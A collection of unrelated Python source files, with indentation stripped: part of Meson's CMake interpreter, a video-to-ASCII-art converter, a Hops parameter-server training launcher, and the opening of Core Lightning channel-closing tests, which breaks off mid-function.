i.postprocess(self.output_target_map, self.src_dir, self.subdir, self.build_dir, custom_target_outputs)
for i in self.targets:
i.postprocess(self.output_target_map, self.src_dir, self.subdir, self.install_prefix, self.trace)
if i.type == 'OBJECT_LIBRARY':
object_libs += [i]
self.languages += [x for x in i.languages if x not in self.languages]
# Second pass: Detect object library dependencies
for i in self.targets:
i.process_object_libs(object_libs)
# Third pass: Reassign dependencies to avoid some loops
for i in self.targets:
i.process_inter_target_dependencies()
for i in self.custom_targets:
i.process_inter_target_dependencies()
# Fourth pass: Remove rassigned dependencies
for i in self.targets:
i.cleanup_dependencies()
mlog.log('CMake project', mlog.bold(self.project_name), 'has', mlog.bold(str(len(self.targets) + len(self.custom_targets))), 'build targets.')
def pretend_to_be_meson(self) -> CodeBlockNode:
if not self.project_name:
raise CMakeException('CMakeInterpreter was not analysed')
def token(tid: str = 'string', val='') -> Token:
return Token(tid, self.subdir, 0, 0, 0, None, val)
def string(value: str) -> StringNode:
return StringNode(token(val=value))
def id_node(value: str) -> IdNode:
return IdNode(token(val=value))
def number(value: int) -> NumberNode:
return NumberNode(token(val=value))
def nodeify(value):
if isinstance(value, str):
return string(value)
elif isinstance(value, bool):
return BooleanNode(token(), value)
elif isinstance(value, int):
return number(value)
elif isinstance(value, list):
return array(value)
return value
def indexed(node: BaseNode, index: int) -> IndexNode:
return IndexNode(node, nodeify(index))
def array(elements) -> ArrayNode:
args = ArgumentNode(token())
if not isinstance(elements, list):
elements = [args]
args.arguments += [nodeify(x) for x in elements if x is not None]
return ArrayNode(args, 0, 0, 0, 0)
def function(name: str, args=None, kwargs=None) -> FunctionNode:
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
args_n = ArgumentNode(token())
if not isinstance(args, list):
args = [args]
args_n.arguments = [nodeify(x) for x in args if x is not None]
args_n.kwargs = {k: nodeify(v) for k, v in kwargs.items() if v is not None}
func_n = FunctionNode(self.subdir, 0, 0, 0, 0, name, args_n)
return func_n
def method(obj: BaseNode, name: str, args=None, kwargs=None) -> MethodNode:
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
args_n = ArgumentNode(token())
if not isinstance(args, list):
args = [args]
args_n.arguments = [nodeify(x) for x in args if x is not None]
args_n.kwargs = {k: nodeify(v) for k, v in kwargs.items() if v is not None}
return MethodNode(self.subdir, 0, 0, obj, name, args_n)
def assign(var_name: str, value: BaseNode) -> AssignmentNode:
return AssignmentNode(self.subdir, 0, 0, var_name, value)
# Generate the root code block and the project function call
root_cb = CodeBlockNode(token())
root_cb.lines += [function('project', [self.project_name] + self.languages)]
# Add the run script for custom commands
run_script = '{}/data/run_ctgt.py'.format(os.path.dirname(os.path.realpath(__file__)))
run_script_var = 'ctgt_run_script'
root_cb.lines += [assign(run_script_var, function('find_program', [[run_script]], {'required': True}))]
# Add the targets
processing = []
processed = {}
name_map = {}
def extract_tgt(tgt: Union[ConverterTarget, ConverterCustomTarget, CustomTargetReference]) -> IdNode:
tgt_name = None
if isinstance(tgt, (ConverterTarget, ConverterCustomTarget)):
tgt_name = tgt.name
elif isinstance(tgt, CustomTargetReference):
tgt_name = tgt.ctgt.name
assert(tgt_name is not None and tgt_name in processed)
res_var = processed[tgt_name]['tgt']
return id_node(res_var) if res_var else None
def detect_cycle(tgt: Union[ConverterTarget, ConverterCustomTarget]) -> None:
if tgt.name in processing:
raise CMakeException('Cycle in CMake inputs/dependencies detected')
processing.append(tgt.name)
def resolve_ctgt_ref(ref: CustomTargetReference) -> BaseNode:
tgt_var = extract_tgt(ref)
if len(ref.ctgt.outputs) == 1:
return tgt_var
else:
return indexed(tgt_var, ref.index)
def process_target(tgt: ConverterTarget):
detect_cycle(tgt)
# First handle inter target dependencies
link_with = []
objec_libs = [] # type: List[IdNode]
sources = []
generated = []
generated_filenames = []
custom_targets = []
dependencies = []
for i in tgt.link_with:
assert(isinstance(i, ConverterTarget))
if i.name not in processed:
process_target(i)
link_with += [extract_tgt(i)]
for i in tgt.object_libs:
assert(isinstance(i, ConverterTarget))
if i.name not in processed:
process_target(i)
objec_libs += [extract_tgt(i)]
for i in tgt.depends:
if not isinstance(i, ConverterCustomTarget):
continue
if i.name not in processed:
process_custom_target(i)
dependencies += [extract_tgt(i)]
# Generate the source list and handle generated sources
for i in tgt.sources + tgt.generated:
if isinstance(i, CustomTargetReference):
if i.ctgt.name not in processed:
process_custom_target(i.ctgt)
generated += [resolve_ctgt_ref(i)]
generated_filenames += [i.filename()]
if i.ctgt not in custom_targets:
custom_targets += [i.ctgt]
else:
sources += [i]
# Add all header files from all used custom targets. This
# ensures that all custom targets are built before any
# sources of the current target are compiled and thus all
# header files are present. This step is necessary because
# CMake always ensures that a custom target is executed
# before another target if at least one output is used.
for i in custom_targets:
for j in i.outputs:
if not is_header(j) or j in generated_filenames:
continue
generated += [resolve_ctgt_ref(i.get_ref(j))]
generated_filenames += [j]
# Determine the meson function to use for the build target
tgt_func = tgt.meson_func()
if not tgt_func:
raise CMakeException('Unknown target type "{}"'.format(tgt.type))
# Determine the variable names
inc_var = '{}_inc'.format(tgt.name)
dir_var = '{}_dir'.format(tgt.name)
sys_var = '{}_sys'.format(tgt.name)
src_var = '{}_src'.format(tgt.name)
dep_var = '{}_dep'.format(tgt.name)
tgt_var = tgt.name
# Generate target kwargs
tgt_kwargs = {
'link_args': tgt.link_flags + tgt.link_libraries,
'link_with': link_with,
'include_directories': id_node(inc_var),
'install': tgt.install,
'install_dir': tgt.install_dir,
'override_options': tgt.override_options,
'objects': [method(x, 'extract_all_objects') for x in objec_libs],
}
# Handle compiler args
for key, val in tgt.compile_opts.items():
tgt_kwargs['{}_args'.format(key)] = val
# Handle -fPCI, etc
if tgt_func == 'executable':
tgt_kwargs['pie'] = tgt.pie
elif tgt_func == 'static_library':
tgt_kwargs['pic'] = tgt.pie
# declare_dependency kwargs
dep_kwargs = {
'link_args': tgt.link_flags + tgt.link_libraries,
'link_with': id_node(tgt_var),
'compile_args': tgt.public_compile_opts,
'include_directories': id_node(inc_var),
}
if dependencies:
generated += dependencies
# Generate the function nodes
dir_node = assign(dir_var, function('include_directories', tgt.includes))
sys_node = assign(sys_var, function('include_directories', tgt.sys_includes, {'is_system': True}))
inc_node = assign(inc_var, array([id_node(dir_var), id_node(sys_var)]))
node_list = [dir_node, sys_node, inc_node]
if tgt_func == 'header_only':
del dep_kwargs['link_with']
dep_node = assign(dep_var, function('declare_dependency', kwargs=dep_kwargs))
node_list += [dep_node]
src_var = None
tgt_var = None
else:
src_node = assign(src_var, function('files', sources))
tgt_node = assign(tgt_var, function(tgt_func, [tgt_var, [id_node(src_var)] + generated], tgt_kwargs))
node_list += [src_node, tgt_node]
if tgt_func in ['static_library', 'shared_library']:
dep_node = assign(dep_var, function('declare_dependency', kwargs=dep_kwargs))
node_list += [dep_node]
else:
dep_var = None
# Add the nodes to the ast
root_cb.lines += node_list
processed[tgt.name] = {'inc': inc_var, 'src': src_var, 'dep': dep_var, 'tgt': tgt_var, 'func': tgt_func}
name_map[tgt.cmake_name] = tgt.name
def process_custom_target(tgt: ConverterCustomTarget) -> None:
# CMake allows to specify multiple commands in a custom target.
# To map this to meson, a helper script is used to execute all
# commands in order. This additionally allows setting the working
# directory.
detect_cycle(tgt)
tgt_var = tgt.name # type: str
def resolve_source(x: Any) -> Any:
if isinstance(x, ConverterTarget):
if x.name not in processed:
process_target(x)
return extract_tgt(x)
if isinstance(x, ConverterCustomTarget):
if x.name not in processed:
process_custom_target(x)
return extract_tgt(x)
elif isinstance(x, CustomTargetReference):
if x.ctgt.name not in processed:
process_custom_target(x.ctgt)
return resolve_ctgt_ref(x)
else:
return x
# Generate the command list
command = []
command += [id_node(run_script_var)]
command += ['-o', '@OUTPUT@']
if tgt.original_outputs:
command += ['-O'] + tgt.original_outputs
command += ['-d', tgt.working_dir]
# Generate the commands. Subcommands are separated by ';;;'
for cmd in tgt.command:
command += [resolve_source(x) for x in cmd] + [';;;']
tgt_kwargs = {
'input': [resolve_source(x) for x in tgt.inputs],
'output': tgt.outputs,
'command': command,
'depends': [resolve_source(x) for x in tgt.depends],
}
root_cb.lines += [assign(tgt_var, function('custom_target', [tgt.name], tgt_kwargs))]
processed[tgt.name] = {'inc': None, 'src': None, 'dep': None, 'tgt': tgt_var, 'func': 'custom_target'}
# Now generate the target function calls
for i in self.custom_targets:
if i.name not in processed:
process_custom_target(i)
for i in self.targets:
if i.name not in processed:
process_target(i)
self.generated_targets = processed
self.internal_name_map = name_map
return root_cb
def target_info(self, target: str) -> Optional[Dict[str, str]]:
# Try resolving the target name
# start by checking if there is a 100% match (excluding the name prefix)
prx_tgt = generated_target_name_prefix + target
if prx_tgt in self.generated_targets:
return self.generated_targets[prx_tgt]
# check if there exists a name mapping
if target in self.internal_name_map:
target = self.internal_name_map[target]
assert(target in self.generated_targets)
return self.generated_targets[target]
return None
def target_list(self) -> List[str]:
prx_str = generated_target_name_prefix
prx_len = len(prx_str)
res = [x for x in self.generated_targets.keys()]
res = [x[prx_len:] if x.startswith(prx_str) else x for x in res]
return res
|
video_to_ascii.py
|
from image_to_ascii import image_to_ascii
import cv2,os,numpy as np
import concurrent.futures
from threading import Thread
from time import perf_counter,sleep as nap
import argparse
# may add sound later .\
class ascii_video :
""" working of class
extract image and yield
convert into ascii image
save in the video
"""
ascii_range_dictCHARS = [
' ','.',
',',"'",
'"',':',
";",'-',
'*','~',
'+','=',
'?','/',
'|','#',
'%','₹',
'$','@']
def __init__(self,video,output_video,fps,pbs):
self.pbs = pbs
self.video_name = video
self.video_output_name = output_video
self.fps = fps
if not os.path.exists(self.video_name) : raise Exception("File not found!!!")
self.ascii_range_dictCHARS.reverse()
self.pixle_to_ascii_dict = {}
for index,key in enumerate(np.linspace(0,255,num=len(self.ascii_range_dictCHARS),endpoint=True)):
key = round(key)
if index == 0 :
last = index
continue
for px in range(last,key+1) :
self.pixle_to_ascii_dict[px] = self.ascii_range_dictCHARS[index]
last = key
self.pixle_count_in_block = self.pbs**2
self.frame_list = []
def __enter__(self):
# this will start reading and writting the frames
print("starting the functions ...")
# reading video stuff
self.vidcap = cv2.VideoCapture(self.video_name)
# fps set for reading and saving file
self.total_frames = int(self.vidcap.get(cv2.CAP_PROP_FRAME_COUNT))
print("Total frame count is --> ",self.total_frames)
default_fps = round(self.vidcap.get(cv2.CAP_PROP_FPS))
print("default fps of video is --> ",default_fps)
if self.fps < default_fps : self.steps = round(default_fps/self.fps)
else : self.steps = 1
self.fps =int(default_fps/self.steps)
print("new fps of video is --> ",self.fps)
self.reader_completed = False
# extracting first frame for the setup
success,frame = self.vidcap.read()
self.width,self.height = tuple(list(frame.shape)[0:2][::-1]) # for creating ascii from the image
# blank black image
self.blank_black = np.zeros((self.height,self.width,3), np.uint8)
# for ascii conversion
self.ascii_in_pixles = np.full([self.height//self.pbs,self.width//self.pbs], "", dtype=np.object)
# writting video stuff
self.writer = cv2.VideoWriter(self.video_output_name, cv2.VideoWriter_fourcc(*"mp4v"), self.fps,tuple(list(frame.shape)[0:2][::-1]) )
return self
def __exit__(self,a,b,c):
self.vidcap.release() # print(self.vidcap.isOpened())
print(f"\nSaving video as - { self.video_output_name }")
self.writer.release()
def iter_each_frame(self):
success = True
t1 = Thread(target = lambda : None )
t1.start()
while success:
count = int(self.vidcap.get(1))
success,frame = self.vidcap.read()
if count%self.steps == 0 and success :
if success and self.total_frames > count :
print(f"Working on frame -> '{str(count).zfill(5)}'")
t1.join()
t1 = Thread(target = lambda : self.frame_list.append(frame))
t1.start()
# make it save frames in thread in frame list
self.reader_completed = True
print("Just funishing up last -",len(self.frame_list),"process 😄😄")
def image_to_ascii_convertor(self,image):
# read the image in the b&w format transpose it and return the ascii nested list for that
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY).transpose()
ascii_in_pixles = np.copy(self.ascii_in_pixles)
# use numpy for fast working here
for index_h,h in enumerate(range(0,self.height,self.pbs)) :
for index_w,w in enumerate(range(0,self.width,self.pbs)) :
try :
sum_ = sum(image[w:w + self.pbs,h:h+self.pbs].flatten())
average = round(float(sum_)/self.pixle_count_in_block)
ascii_in_pixles[index_h][index_w] = self.pixle_to_ascii_dict[average]
except : pass # last some pixle less then pixle_count_in_block will be leaved because they may cause some irragularity in shades
return ascii_in_pixles
def frame_to_ascii_to_ascii_image(self,current_frame):
# take frame extract ascii data and return the ascii image
# print('converting to ASCII images' ,end = " - ")
ascii_data = self.image_to_ascii_convertor(current_frame)
# copy that blank image here black image
image = np.copy(self.blank_black)
# np.zeros((self.height,self.width,3), np.uint8)
# updating the text in it
for index_r,row in enumerate(ascii_data) :
for index_c,ascii_val in enumerate(row) :
if ascii_val.strip() != "" :
image = cv2.putText(image,ascii_val,(index_c*self.pbs,(index_r+1)*self.pbs),cv2.FONT_HERSHEY_PLAIN,0.9,(255,255,255),1)
return image
def add_ascii_frame(self,frame):
# convert the frame into ascii then convert the ascii to ascii frame
ascii_frame = self.frame_to_ascii_to_ascii_image(frame)
self.writer.write(ascii_frame) # save the frame
def frame_thread_superviser(self):
print("working on image computing")
while not self.reader_completed :
with concurrent.futures.ThreadPoolExecutor() as executor:
new_frames = executor.map(self.frame_to_ascii_to_ascii_image , self.frame_list )
for new_frame in new_frames:
Thread(target=lambda : self.frame_list.pop(0) ).start()
self.writer.write(new_frame) # save the frame
print("Just funishing up last -",len(self.frame_list),"process 😄😄")
with concurrent.futures.ThreadPoolExecutor() as executor:
new_frames = executor.map(self.frame_to_ascii_to_ascii_image , self.frame_list )
for new_frame in new_frames:
Thread(target=lambda : self.frame_list.pop(0) ).start()
self.writer.write(new_frame) # save the frame
print('Done. 😎')
@classmethod
def runner(cls,video,output_video,fps,pbs):
with cls(video,output_video,fps,pbs) as ascii_video :
reader = Thread(target= ascii_video.iter_each_frame )
reader.start()
# start the frame saving thread
saver = Thread(target = ascii_video.frame_thread_superviser)
saver.start()
# waiting for complete all the reading frames
reader.join()
print('waiting for the results...')
saver.join()
# example - args - inputVideo, outoutVideo,fps,pbs
# ascii_video.runner('ab.mp4',"Ascii_video2.mp4",30,10)
# ascii_video.runner('ab.mp4',"Ascii_video2.mp4",30,10)
if __name__ == "__main__" :
parser = argparse.ArgumentParser()
parser.add_argument('-f','--file' ,help = "name of the file you wanna use with extention !")
parser.add_argument('-o','--outfile',default = "Ascii_video.mp4" ,help = "name of the output file !")
parser.add_argument('--fps' ,default = 20,type = int,help = "fps of the output videos ! (default = 20)")
parser.add_argument('--pbs' ,default = 15,type = int,help = "pixle block size | smaller the number much fine result and but slow processing (default = 15 )")
args = parser.parse_args()
print(args)
if args.file:
start = perf_counter()
ascii_video.runner(args.file,args.outfile,args.fps,args.pbs)
finish = perf_counter()
print(f"Total time Taken {finish - start}s")
else :
raise Exception('file name is important for the program use -h for help')
|
parameter_server.py
|
"""
Utility functions to retrieve information about available services and setting up security for the Hops platform.
These utils facilitates development by hiding complexity for programs interacting with Hops services.
"""
import os
from hops import hdfs as hopshdfs
from hops import tensorboard
from hops import devices
from hops import util
import pydoop.hdfs
import threading
import datetime
import socket
import json
from . import parameter_server_reservation
run_id = 0
def _launch(sc, map_fun, local_logdir=False, name="no-name"):
"""
Args:
sc:
map_fun:
local_logdir:
name:
Returns:
"""
global run_id
app_id = str(sc.applicationId)
num_executions = util.num_executors()
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
#Make SparkUI intuitive by grouping jobs
sc.setJobGroup("ParameterServerStrategy", "{} | Distributed Training".format(name))
server = parameter_server_reservation.Server(num_executions)
server_addr = server.start()
num_ps = util.num_param_servers()
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, num_ps))
logdir = _get_logdir(app_id)
path_to_metric = logdir + '/metric'
if pydoop.hdfs.path.exists(path_to_metric):
with pydoop.hdfs.open(path_to_metric, "r") as fi:
metric = float(fi.read())
fi.close()
return metric, logdir
print('Finished Experiment \n')
return None, logdir
def _get_logdir(app_id):
"""
Args:
app_id:
Returns:
"""
global run_id
return hopshdfs._get_experiments_dir() + '/' + app_id + '/parameter_server/run.' + str(run_id)
def _prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, num_ps):
"""
Args:
app_id:
run_id:
map_fun:
local_logdir:
server_addr:
num_ps:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
iter:
Returns:
"""
for i in iter:
executor_num = i
tb_hdfs_path = ''
hdfs_exec_logdir = ''
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
role = None
client = parameter_server_reservation.Client(server_addr)
try:
host = util._get_ip_address()
tmp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmp_socket.bind(('', 0))
port = tmp_socket.getsockname()[1]
host_port = host + ":" + str(port)
exec_spec = {}
if executor_num < num_ps:
exec_spec["task_type"] = "ps"
else:
exec_spec["task_type"] = "worker"
exec_spec["host_port"] = host_port
exec_spec["gpus_present"] = devices.get_num_gpus() > 0
client.register(exec_spec)
cluster = client.await_reservations()
tmp_socket.close()
role, index = _find_task_and_index(host_port, cluster)
cluster_spec = {}
cluster_spec["cluster"] = cluster
cluster_spec["task"] = {"type": role, "index": index}
print(cluster_spec)
os.environ["TF_CONFIG"] = json.dumps(cluster_spec)
if role == "chief":
hdfs_exec_logdir, hdfs_appid_logdir = hopshdfs._create_directories(app_id, run_id, None, 'parameter_server')
pydoop.hdfs.dump('', os.environ['EXEC_LOGFILE'], user=hopshdfs.project_user())
hopshdfs._init_logger()
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_appid_logdir, executor_num, local_logdir=local_logdir)
gpu_str = '\nChecking for GPUs in the environment' + devices._get_gpu_info()
if role == "chief":
hopshdfs.log(gpu_str)
print(gpu_str)
print('-------------------------------------------------------')
print('Started running task \n')
if role == "chief":
hopshdfs.log('Started running task')
task_start = datetime.datetime.now()
retval=None
if role == "ps":
ps_thread = threading.Thread(target=lambda: map_fun())
ps_thread.start()
print("waiting for workers")
client.await_all_workers_finished()
print("waiting finished")
else:
retval = map_fun()
if role == "chief":
if retval:
_handle_return(retval, hdfs_exec_logdir)
task_end = datetime.datetime.now()
time_str = 'Finished task - took ' + util._time_diff(task_start, task_end)
print('\n' + time_str)
print('-------------------------------------------------------')
if role == "chief":
hopshdfs.log(time_str)
except:
raise
finally:
if role == "worker" or role == "chief":
client.register_worker_finished()
client.close()
if role == "chief":
if local_logdir:
local_tb = tensorboard.local_logdir_path
util._store_local_tensorboard(local_tb, hdfs_exec_logdir)
if devices.get_num_gpus() > 0:
t.do_run = False
t.join(20)
_cleanup(tb_hdfs_path)
return _wrapper_fun
def _cleanup(tb_hdfs_path):
"""
Args:
tb_hdfs_path:
Returns:
"""
handle = hopshdfs.get()
if not tb_hdfs_path == None and not tb_hdfs_path == '' and handle.exists(tb_hdfs_path):
handle.delete(tb_hdfs_path)
hopshdfs._kill_logger()
def _find_task_and_index(host_port, cluster_spec):
"""
Args:
host_port:
cluster_spec:
Returns:
"""
index = 0
for entry in cluster_spec["worker"]:
if entry == host_port:
return "worker", index
index = index + 1
index = 0
for entry in cluster_spec["ps"]:
if entry == host_port:
return "ps", index
index = index + 1
if cluster_spec["chief"][0] == host_port:
return "chief", 0
def _handle_return(val, hdfs_exec_logdir):
"""
Args:
val:
hdfs_exec_logdir:
Returns:
"""
try:
test = int(val)
except:
raise ValueError('Your function should return a metric (number).')
metric_file = hdfs_exec_logdir + '/metric'
fs_handle = hopshdfs.get_fs()
try:
fd = fs_handle.open_file(metric_file, mode='w')
except:
fd = fs_handle.open_file(metric_file, flags='w')
fd.write(str(float(val)).encode())
fd.flush()
fd.close()
|
test_closing.py
|
from fixtures import * # noqa: F401,F403
from flaky import flaky
from pyln.client import RpcError, Millisatoshi
from shutil import copyfile
from pyln.testing.utils import SLOW_MACHINE
from utils import (
only_one, sync_blockheight, wait_for, TIMEOUT,
account_balance, first_channel_id, closing_fee, TEST_NETWORK,
scriptpubkey_addr, calc_lease_fee, EXPERIMENTAL_FEATURES
)
import os
import queue
import pytest
import re
import subprocess
import threading
import unittest
@pytest.mark.developer("Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind, chainparams):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
fee = closing_fee(3750, 2) if not chainparams['elements'] else 3603
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
# The entry in the channels table should still be there
assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
def test_closing_while_disconnected(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
fut = executor.submit(l1.rpc.close, chan, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
fut.result(TIMEOUT)
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_disconnected_notify(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l2.stop()
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
out = subprocess.check_output(['cli/lightning-cli',
'--network={}'.format(TEST_NETWORK),
'--lightning-dir={}'
.format(l1.daemon.lightning_dir),
'close',
l2.info['id'],
'5']).decode('utf-8').splitlines()
assert out[0] == '# peer is offline, will negotiate once they reconnect (5 seconds before unilateral close).'
assert out[1] == '# Timed out, forcing close.'
assert not any([line.startswith('#') for line in out[2:]])
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fundchannel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@pytest.mark.slow_test
def test_closing_torture(node_factory, executor, bitcoind):
# We set up a fully-connected mesh of N nodes, then try
# closing them all at once.
amount = 10**6
num_nodes = 10 # => 45 channels (36 seconds on my laptop)
if node_factory.valgrind:
num_nodes -= 4 # => 15 (135 seconds)
nodes = node_factory.get_nodes(num_nodes)
# Make sure bitcoind has plenty of utxos
bitcoind.generate_block(num_nodes)
# Give them all plenty of UTXOs, make sure they see them
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
addr = nodes[i].rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txs = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
nodes[i].rpc.connect(nodes[j].info['id'], 'localhost', nodes[j].port)
txs.append(nodes[i].rpc.fundchannel(nodes[j].info['id'], amount)['txid'])
# Make sure they're all in, then lock them in.
bitcoind.generate_block(1, wait_for_mempool=txs)
# Wait for them all to be CHANNELD_NORMAL
for n in nodes:
wait_for(lambda: all(p['channels'][0]['state'] == 'CHANNELD_NORMAL' for p in n.rpc.listpeers()['peers']))
# Start closers: can take a long time under valgrind!
futures = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
futures.append(executor.submit(nodes[i].rpc.close, nodes[j].info['id']))
futures.append(executor.submit(nodes[j].rpc.close, nodes[i].info['id']))
# Wait for close to finish
close_txs = set()
for f in futures:
# If one side completes closing, we'll get an error here 'Peer has no active channel'
try:
close_txs.add(f.result(TIMEOUT)['txid'])
except RpcError as err:
assert err.error['message'] == 'Peer has no active channel'
# Should have one close for each open.
assert len(close_txs) == len(txs)
# Get closes confirmed
bitcoind.generate_block(100, wait_for_mempool=list(close_txs))
# And make sure they hangup.
for n in nodes:
wait_for(lambda: n.rpc.listpeers()['peers'] == [])
@pytest.mark.slow_test
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/11000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 11000, 15000, 7400], [8000, 6000, 1001, 100]]
balance = [False, True]
num_peers = len(feerates) * len(balance)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for b in balance:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.balance = balance
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.balance:
l1.pay(p, 100000000)
# Now close all channels (not unilaterally!)
closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
